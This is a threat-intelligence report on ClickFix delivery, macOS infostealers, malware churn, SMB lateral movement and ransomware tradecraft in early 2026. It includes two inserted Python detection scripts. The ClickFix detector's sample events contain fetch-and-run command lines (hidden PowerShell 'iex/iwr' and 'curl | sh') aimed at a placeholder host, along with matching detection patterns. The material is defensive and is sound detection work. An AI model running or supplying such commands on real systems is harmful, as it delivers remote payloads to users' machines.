Editor’s Note: This report was authored by Raigridas Bartkus
Key Points
The “ClickFix” technique dominated delivery and can no longer be treated as an emerging threat. It led initial access as Spearphishing Link (14.9%), drove nearly 28% of defense-evasion activity and reached macOS for the first time. Alongside it, the malware leaderboard turned over almost completely for a second straight period, making the behavior, not the malware name, the thing to defend against.
Ransomware consolidated around a shared playbook. Whichever name tops the data-leak site, the leading groups all break using unpatched internet-facing firewalls and VPNs, Cloudflared tunnels, and single-host Server Message Block (SMB) encryption.
Defenders should focus on three things: Spot attacks by behavior rather than by malware name, keep ClickFix detection running on both Windows and macOS, and patch internet-facing firewalls and VPNs fast while watching them for rogue tunnels and unusual file-share traffic.
Between March 1 and May 31, 2026 (“the reporting period”), attackers achieved their objectives by exploiting trusted identities, devices, and tools rather than malicious code. Because their activity resembled normal behavior, traditional perimeter and file-scanning defenses often failed to catch it.
Adversaries leaned on two strategies: social engineering at scale and attacks on unpatched, internet-facing infrastructure. The leading technique “ClickFix” drove the first, shifting delivery from compromised websites to emailed links, while “Qilin,” the period’s most active ransomware operator, continued exploiting unpatched edge devices for mass extortion. What’s more, AI is making social engineering faster, cheaper, and more convincing, accelerating familiar techniques rather than creating new ones.
This marks our third consecutive report showing this pattern. The cast of malware families and ransomware brands changes each period, but methods hold steady. Security leaders must defend against these repeating behaviors, not scramble quarter by quarter to block whichever name currently tops the threat leaderboard.
Read on to learn:
Why ClickFix’s rise to the leading delivery method, including its first use on macOS, demands always-on detection and response.
How a second straight near-total malware leaderboard turnover reinforces the need to detect behavior, not family names.
Why a reshuffled ransomware leaderboard, led by Qilin for a fourth straight quarter, hides a sharp convergence in attacker tradecraft.
One Steady Delivery Lane, Constantly Rotating Malware
Delivery remained steady, anchored by ClickFix, even as malware families changed too quickly to track by name. ClickFix is the delivery technique, while the payloads rotate. Confusing the two leads defenders to chase malware names instead of the underlying behavior.
A Near-Complete Turnover of the Malware Leaderboard
The malware headline this period is churn. For the second consecutive period, the leaderboard changed almost completely (see Figure 1), showing that malware families now rotate too quickly for name-based tracking. Whether this reflects better defenses against certificate abuse and remote-access trojan (RAT)-based delivery or a more fluid ecosystem, the takeaway is that defenders should focus on behavior, especially USB-borne worm spread and abuse of legitimate remote tools.
Last period’s leaders—“BaoLoader” (41%), “Shai-Hulud” (27%), and “RemcosRAT” (18%)—fell out of the top three, replaced by “Gamarue” (aka “Andromeda”), “NetSupport RAT”, and “Raspberry Robin.”
Gamarue is an older modular worm that spreads through removable media using malicious .lnk files and autorun entries. NetSupport RAT is the abused version of the legitimate NetSupport Manager remote-support tool and the payload that ClickFix most often delivers. Raspberry Robin is another removable-media worm often used to broker access for ransomware operators, turning a single infected USB into an early step toward encryption.
Two of the top three families spread through removable media, reinforcing the “seasonal USB” pattern we first flagged in 2025: USB-based infections tend to rise during predictable periods such as US tax season and Q1 financial reporting. With removable media again among the top initial-access techniques, that pattern now looks persistent rather than temporary.

ClickFix Dominates Malware Delivery
ClickFix remained the dominant delivery method this period and, for the first time, we observed it expand to macOS, delivering infostealers onto a platform many organizations still monitor less closely than Windows. This means ClickFix can no longer be handled as a special case. Training, detection, and triage for it should run continuously on both Windows and macOS.
ClickFix is a social-engineering technique, not a malware family. It tricks users into pasting attacker-supplied commands into trusted system dialogs, bypassing file- and email-based defenses. We measure its prevalence through the MITRE ATT&CK techniques it drives, where it leads initial access and much defense-evasion activity. Among this period’s charted families, NetSupport RAT is its clearest payload; Gamarue and Raspberry Robin instead spread through removable media.
ClickFix use has risen steadily from second place in our last report to the top delivery technique now. This period we also saw a ClickFix loader use likely AI-generated obfuscation to deliver “Deepload” malware, burying its real logic under thousands of meaningless variable assignments to defeat static scanning. This helps attackers produce new variants faster and reduces defenders’ time to adapt signatures.
Atomic macOS Stealer Extends ClickFix to macOS
The clearest example of ClickFix reaching macOS this period was “Atomic macOS Stealer” (AMOS). What changed was how it was delivered. Attackers used to disguise AMOS as pirated ("cracked") software or as fake copies of Homebrew, the popular Mac software-installation tool. This period, they switched to an applescript:// link that automatically opens Script Editor, a scripting app built into macOS, and runs the attacker's commands there. The change was likely designed to bypass the warning Apple added in macOS 26.4 that appears when users paste commands into the Terminal command-line app, a warning that isn’t triggered by Script Editor.
AMOS’s capabilities stayed the same, but its reach expanded. It steals browser credentials, session cookies, crypto wallets, and keychain data, feeding directly into valid-account abuse. For enterprises, macOS must no longer be treated as lower risk and now needs the same monitoring and response coverage as Windows.
Step Up Your Defenses
How ReliaQuest Helps You Stay Ahead
ReliaQuest detection content is continuously updated using the latest relevant threat intelligence to focus on catching malware early, at the delivery stage.
GreyMatter Automated Response Playbooks turn detection into action by isolating hosts, revoking sessions, or resetting passwords within minutes to cut off attackers before they can move laterally. Organizations can reduce their mean time to contain (MTTC) to five minutes or less by pairing our detection rules with the following Playbooks:
Block IP/Block URL: Severs the ClickFix download and redirect infrastructure and the NetSupport RAT command-and-control (C2) channel, so the payload can’t fetch its next stage or call home.
Ban Hash + Delete File: Blocks and removes the worm payloads and NetSupport droppers that ClickFix leaves behind.
Reset Password + Terminate Sessions: Revokes the browser sessions, cookies, and tokens that an AMOS-style stealer exfiltrates, since reimaging the host doesn't invalidate credentials already lifted.
Your Action Plan
The following steps target this period's dominant delivery methods, but because many of the malware families here use the same channels, the same training, lockdown, and allowlisting cut exposure to the rest too.
Train users against ClickFix on Windows and macOS. Train users not to paste commands into Run, Terminal, or Script Editor, and simulate ClickFix-style lures on Windows and macOS (like CAPTCHA and verification prompts, “paste this to continue” clipboard steps, and browser-to-shell hand-offs).
Lock down removable media and execution paths. Disable USB autorun, enforce device allowlists, and alert on shortcut (.lnk) or script execution from external drives. Where disabling Win+R isn’t feasible, restrict it for standard users in high-risk roles, or log and alert on RunMRU activity instead.
Maintain an allowlist of remote-access tools and extend monitoring to macOS. Treat any unapproved NetSupport, SimpleHelp, or similar install as a high-priority alert, and on macOS, alert on non-Apple processes reading the login keychain or invoking the security command-line interface (CLI) to dump credentials.
Top Tactics Targeting Enterprise Environments
This section covers the MITRE ATT&CK tactics that shaped attacker behavior this period across initial access, defense evasion, and lateral movement. The common thread is abuse of trusted accounts, tools, and protocols. It’s also where ClickFix appears as a technique rather than a malware family.
Spearphishing Leads Initial Access, Removable Media Close Behind
The main initial-access shift this period was Drive-By Compromise dropping out of the top three, likely because many ClickFix campaigns moved from websites (recorded under “Drive-By”) to email (recorded under “Spearphishing”). This favors defenders, because unlike drive-by attacks, emailed lures must pass through the mail pipeline, where gateways, link rewriting, and sandboxing can stop them before the click.
Removable Media remained the other major access path, tied to Gamarue and Raspberry Robin and reinforcing the need to lock down external devices to control both initial access and malware spread.
Domain Accounts reflected straightforward valid-account abuse, where attackers sign in with credentials the directory is built to trust. Across all three, attackers relied on channels and access the organization already trusts.

Defense Evasion Split: Masquerading vs. the ClickFix Execution Chain
The masquerading technique Match Legitimate Name or Location represents the on-host side of the same trust abuse seen across this report.
Attackers disguise tools, files, and processes as legitimate software to blend in. Because of this, checking a file's unique fingerprint (i.e., its hash) against known-bad lists no longer works well, so the better tell is a legitimate-looking file showing up in the wrong place or under the wrong name.
Behind it is the ClickFix execution chain. Command Obfuscation and Obfuscated Files or Information are two parts of the same activity: A pasted command runs through an obfuscated command line, then pulls a heavily obfuscated payload. Together they make up nearly 28% of defense-evasion activity—almost unchanged from last quarter—and represent the clearest on-host fingerprint of ClickFix.

When attackers use trusted interpreters and legitimate-looking tools, file-reputation and signature controls struggle, so defenders need to focus on behavior: what the process does and where it runs.
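The on-host chain described above (a pasted command, an obfuscated command line, then a remote second stage) and the earlier action-plan items on Run/RunMRU, Terminal and Script Editor lend themselves to a scoring rule over process-creation events. The following Python is an added example, not ReliaQuest detection content; the event field names, the marker list and the example.invalid URLs are assumptions, and the sample events are constructed.

```python
"""Triage logic for the ClickFix on-host chain: a user-pasted command launched
from a trusted dialog (Run, Terminal, Script Editor) that starts an interpreter
with an obfuscated command line and fetches a second stage.

Added example, not ReliaQuest detection content. Events are constructed
process-creation records; field names (parent, image, cmdline, user) are
assumptions, and example.invalid is a placeholder host.
"""
import re

# Parents that indicate a human pasted the command rather than a script or
# installer launching it. explorer.exe is the parent of the Windows Run dialog.
PASTE_PARENTS = {"explorer.exe", "Terminal", "Script Editor", "osascript"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "bash", "sh", "zsh", "osascript", "curl"}
# Each marker maps to one of the report's two evasion techniques: an obfuscated
# command line (Command Obfuscation) or a remote fetch of an obfuscated payload.
MARKERS = {
    r"(?i)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}": "encoded command",
    r"(?i)-w(indowstyle)?\s+h(idden)?": "hidden window",
    r"(?i)\b(iex|iwr|invoke-expression|invoke-webrequest|downloadstring)\b": "in-memory fetch/exec",
    r"(?i)\bcurl\b.*\|\s*(sh|bash|zsh)\b": "pipe-to-shell",
    r"(?i)\b(base64|frombase64string)\b": "base64 decode",
    r"https?://": "remote URL",
}

def score_event(ev):
    """Return (score, reasons) for one process-creation event. One point each for a
    paste-style parent, an interpreter image, and every marker found in the command line."""
    reasons = []
    if ev["parent"] in PASTE_PARENTS:
        reasons.append(f"launched from {ev['parent']}")
    if ev["image"] in INTERPRETERS:
        reasons.append(f"interpreter {ev['image']}")
    for pattern, label in MARKERS.items():
        if re.search(pattern, ev["cmdline"]):
            reasons.append(label)
    return len(reasons), reasons

# Constructed sample events: two ClickFix-style chains (Windows and macOS) and
# one benign management-launched script that must stay below the threshold.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe", "user": "jdoe",
     "cmdline": "powershell -w hidden -c \"iex (iwr http://example.invalid/v).Content\""},
    {"parent": "Script Editor", "image": "osascript", "user": "mlee",
     "cmdline": "osascript -e 'do shell script \"curl -fsSL http://example.invalid/i | sh\"'"},
    {"parent": "ccmexec.exe", "image": "powershell.exe", "user": "SYSTEM",
     "cmdline": "powershell -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},
]

def triage(events, threshold=3):
    """Return (user, score, reasons) for every event at or above the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["user"], score, reasons))
    return hits

if __name__ == "__main__":
    for user, score, reasons in triage(SAMPLE_EVENTS):
        print(f"ClickFix candidate: user={user} score={score} {', '.join(reasons)}")
```

The threshold deliberately requires more than an interpreter plus one marker, so a sanctioned deployment tool running a signed script scores too low to alert.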
SMB Overtakes RDP as the Top Lateral-Movement Technique
Lateral movement saw the period’s sharpest shift, likely driven by ransomware affiliate churn. Server Message Block (SMB)/Windows Admin Shares roughly tripled from last period, now overtaking RDP, while Windows Remote Management (WinRM) also rose, entering the top three for the first time. SMB had long sat around 12% as a complement to RDP, so 36% is a record high and a sharp break from that baseline, not a return to any earlier level.
Last quarter we flagged ransomware group “Akira” leaning on single-host SMB encryption and forecast the technique would remain a standard ransomware tactic; this quarter it did more than persist—it surged. We assess with moderate confidence that the uptick reflects ransomware affiliates carrying Akira-style tradecraft into other ransomware brands, including Qilin, “DragonForce,” and “The Gentlemen.”
In many SMB cases, encryption ran from a single trusted host, leaving victim machines with little suspicious local activity. That makes detection a network and identity problem: Watch for bulk SMB writes to ADMIN$, C$, or IPC$ shares from non-management hosts. Because legitimate deployment and backup tools also use these shares, baseline known management hosts and service accounts first. The strongest signal is bulk writes from user workstations or newly seen hosts, outside change windows, to many destinations at once.

Step Up Your Defenses
How ReliaQuest Helps You Stay Ahead
Protect your organization against the top initial-access, defense-evasion, and lateral-movement techniques detailed in this report by enabling ReliaQuest detection rules, complemented by the following GreyMatter Automated Response Playbooks:
Disable User/Reset Password: Cuts off the compromised identity by disabling the account and forcing a credential reset, so the stolen logins behind the Domain Accounts abuse above can’t be reused.
Ban Hash + Delete File: Blocks the malicious file from running and removes every copy across the estate, so the renamed, signed-looking binary behind the masquerading can’t resurface or reload after cleanup.
Isolate Host: Severs the host driving the single-host SMB encryption from the network, halting the bulk writes to admin shares at their source.
Your Action Plan
Because the most damaging activity now hides inside legitimate identities, tools, and hosts, each of these priorities comes back to knowing your environment's normal well enough to catch the deviation.
Lock down valid-account abuse. Enforce phishing-resistant MFA on external and privileged access, and alert on sign-ins that break a user’s normal pattern of location, device, or timing.
Baseline legitimate tools and names. Alert on trusted binaries running from non-standard paths and on remote-management tools outside your sanctioned set, the core tells of masquerading.
Treat SMB lateral movement as a tier-one signal. Watch for bulk SMB writes to administrative shares from non-management hosts, after baselining your real management traffic.
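To illustrate the network-and-identity detection described in the SMB lateral-movement section and restated in the action-plan item above, here is an added Python example (not ReliaQuest detection content) that baselines management hosts and a change window, then flags non-management hosts issuing bulk admin-share writes to many destinations; the event fields, host names and thresholds are assumptions, and the events are constructed.

```python
"""Detection logic for single-host SMB encryption: flag hosts that issue bulk
writes to administrative shares across many destinations, after baselining
known management hosts and change windows.

Added example, not ReliaQuest detection content. Each event is a constructed
simplification of a share-access record (source host, destination host, share
name, access type, timestamp); the field names are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed baseline: hosts allowed to write to admin shares, and a nightly
# change window (UTC hours) during which deployment traffic is expected.
MANAGEMENT_HOSTS = {"sccm01", "backup01"}
CHANGE_WINDOW_HOURS = range(1, 4)      # 01:00-03:59 UTC
ADMIN_SHARES = {"ADMIN$", "C$", "IPC$"}
WRITE_ACCESS = {"WriteData", "AppendData"}

# Constructed sample events: sccm01 is a normal nightly deployment; ws-finance-17
# is a user workstation writing to C$ on 30 hosts at 14:02, outside any change
# window, which is the report's strongest signal; ws-hr-04 only reads IPC$.
SAMPLE_EVENTS = [
    {"ts": "2026-04-12T02:10:00", "src": "sccm01", "dst": f"srv{i:02d}",
     "share": "ADMIN$", "access": "WriteData"}
    for i in range(1, 21)
] + [
    {"ts": "2026-04-12T14:02:00", "src": "ws-finance-17", "dst": f"srv{i:02d}",
     "share": "C$", "access": "WriteData"}
    for i in range(1, 31)
] + [
    {"ts": "2026-04-12T14:03:00", "src": "ws-hr-04", "dst": "srv05",
     "share": "IPC$", "access": "ReadData"},
]

def in_change_window(ts):
    """True when the ISO timestamp falls inside the baselined change window."""
    return datetime.fromisoformat(ts).hour in CHANGE_WINDOW_HOURS

def find_bulk_admin_share_writers(events, window=timedelta(minutes=10),
                                  min_targets=10, management_hosts=MANAGEMENT_HOSTS):
    """Return {src: set(dst)} for non-management hosts that wrote to admin shares on
    at least `min_targets` distinct hosts within `window`, outside change windows."""
    per_src = defaultdict(list)
    for e in events:
        if e["share"] not in ADMIN_SHARES or e["access"] not in WRITE_ACCESS:
            continue
        if e["src"] in management_hosts or in_change_window(e["ts"]):
            continue
        per_src[e["src"]].append((datetime.fromisoformat(e["ts"]), e["dst"]))
    alerts = {}
    for src, writes in per_src.items():
        writes.sort()
        # Sliding window over time-ordered writes, counting distinct destinations.
        for i, (t0, _) in enumerate(writes):
            dsts = {d for t, d in writes[i:] if t - t0 <= window}
            if len(dsts) >= min_targets:
                alerts[src] = dsts
                break
    return alerts

if __name__ == "__main__":
    for src, dsts in find_bulk_admin_share_writers(SAMPLE_EVENTS).items():
        print(f"ALERT bulk admin-share writes from {src} to {len(dsts)} hosts")
```

Tune `min_targets` and `window` to your own deployment patterns; the point is that the baseline (management hosts, change window) is applied before the volume threshold, not after.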
Top Ransomware and Extortion Techniques

The leaderboard shifted sharply this quarter, but the more important finding is that the tradecraft behind it converged. The top tier increasingly follows the same playbook: initial access through unpatched internet-facing edge devices, Cloudflared (a legitimate software agent that securely connects a local private network to Cloudflare’s global network) tunnels for C2, and single-host SMB encryption. In practice, defending well against one leading operator now means defending against most of them.
The shared post-access chain was also consistent: edge access, internal reconnaissance, RDP to a domain controller, privilege escalation through credential dumping or abuse of Active Directory Certificate Services (ADCS), and then encryption or large-scale exfiltration. This pattern now matters more than which brand tops the leak site, because the same hands-on activity is appearing across multiple leading groups.
Defenders must focus on the shared chokepoints rather than per-group detections. Prioritize patching and hardening internet-facing edge devices, especially FortiGate appliances; monitor for rogue local accounts and lingering authentication misconfigurations; detect Cloudflared tunnels in environments where they aren’t expected; watch for RDP access to domain controllers; and alert on credential dumping, ADCS abuse, and bulk SMB writes to administrative shares from non-management hosts.
Akira remains a useful example of this playbook, particularly its use of edge-device exploitation, rogue temporary accounts, Cloudflared tunnels, SMB encryption, and ESXi targeting. But the key point this quarter is that these techniques are now being used by multiple groups.
Sector Targeting Sees Across-the-Board Decline
Falling victim counts don’t mean the threat is easing. The ecosystem is consolidating around fewer, more disciplined, higher-impact operators, so incidents may be less frequent but more damaging. For the fourth consecutive period, named-victim counts declined across most sectors, with professional, scientific, and technical services (PSTS) still the most targeted while manufacturing declined sharply.
PSTS firms often sit inside client environments or ship software used by many downstream organizations, making one compromise spread far beyond the named victim. Whether through supply-chain attacks, as seen with the Shai-Hulud npm worm, or inherited exposure in mergers and acquisitions (M&A), the real impact extends to clients, dependents, and acquirers.

Step Up Your Defenses
How ReliaQuest Helps You Stay Ahead
Catch ransomware activity early with our detection rules and use the following GreyMatter Automated Response Playbooks to respond rapidly when the detection rules fire:
Isolate Host: Contains the single trusted host issuing bulk SMB writes before encryption fans out across the network; this is the confirmed active-compromise case where last-resort isolation is warranted.
Block IP/Block URL: Severs the Cloudflared tunnel the converged top-tier playbook relies on for C2 and persistence.
Ban Hash + Delete File: Blocks and removes any file matching the Emergency Hash IOC across the estate.
Your Action Plan
This quarter's ransomware activity converged on the perimeter, so every priority below is about closing the internet-facing inbound paths before they become entry points.
Patch internet-facing devices on emergency timelines and harden them. Pair every patch with configuration hardening: Remove legacy and local VPN accounts and enforce MFA across all authentication formats.
Audit edge devices and ADCS. Hunt your FortiGate and other edge appliances for known Akira and Qilin indicators, such as “temp”-account creation, Cloudflared tunnels, and the hashes in our prior reporting, and review ADCS certificate-template permissions to close the common escalation path.
Treat PSTS firms as pivot points. If you serve other organizations, assume you’re a route into their environments and tightly monitor the privileged inbound paths, such as remote-administration and remote monitoring and management (RMM) tools, shared or federated identity-provider roles, managed VPN and site-to-site links, and shared support accounts.
Key Takeaways and What’s Next
This period sharpened a pattern building across our last three reports. Attackers are reaching their goals by abusing trust, not breaking it. ClickFix tricks users into launching attacks themselves, worms spread through trusted USB media, legitimate tools and admin channels hide malicious activity, and unpatched edge devices keep enabling mass extortion. These attacks rely less on novel malware than on what environments already allow.
AI is accelerating this pattern, not changing it. It makes familiar tactics faster, cheaper, and more convincing, which is why techniques like ClickFix can scale without fundamentally changing.
The takeaway is that signatures, reputation, and perimeter defenses are no longer enough on their own. Detection has to focus more on behavior—what a process does, where a tool runs, and how an account is used—because attacker names and malware families now change too quickly to track effectively.
Three Forecasts for the Next Reporting Period
The malware leaderboard will keep churning, and behavior will stay the only durable signal. Over the next one to two quarters, near-total turnover at the top of the malware family table will highly likely continue, as it has for the last two consecutive periods. This means signature- and name-based detection will keep decaying between reports. AI is accelerating that churn, with attackers increasingly using it to write and rework malicious code. And the shift toward agentic tools that generate and adapt variants with little human input means new families will surface faster than any name-based list can track them. For defenders, the reassuring part is that the response doesn't have to change as fast as the malware does. Detecting how an attack behaves rather than what it's called keeps working however many new variants appear. Meeting attacker AI with AI of your own keeps detection and response in step as variants multiply, and this approach should be put in place today.
Single-host SMB encryption will become the default deployment method. Over the next two to three quarters, it will likely become the most common method among the leading operators. This is because encrypting many hosts from one already-trusted host works in almost any environment and pairs naturally with the Cloudflared persistence these groups already rely on, so it’s both efficient and easy to fold into their existing playbook. We hold this at moderate confidence, based on this reporting period’s jump from 12% to 36%.
Ransomware will keep consolidating around fewer, higher-impact operators. Over the next two to three quarters, named-victim counts will likely keep falling while the impact per incident rises. This is grounded in the fact that Qilin has now led for four straight quarters while the overall count has also fallen for four, and the top tier is already converging on a shared FortiGate-Cloudflared-SMB playbook. That convergence makes the shared edge-device chokepoint the priority to defend, and it means brand-keyed blocklists will keep under-rating rebrands and splinters like The Gentlemen.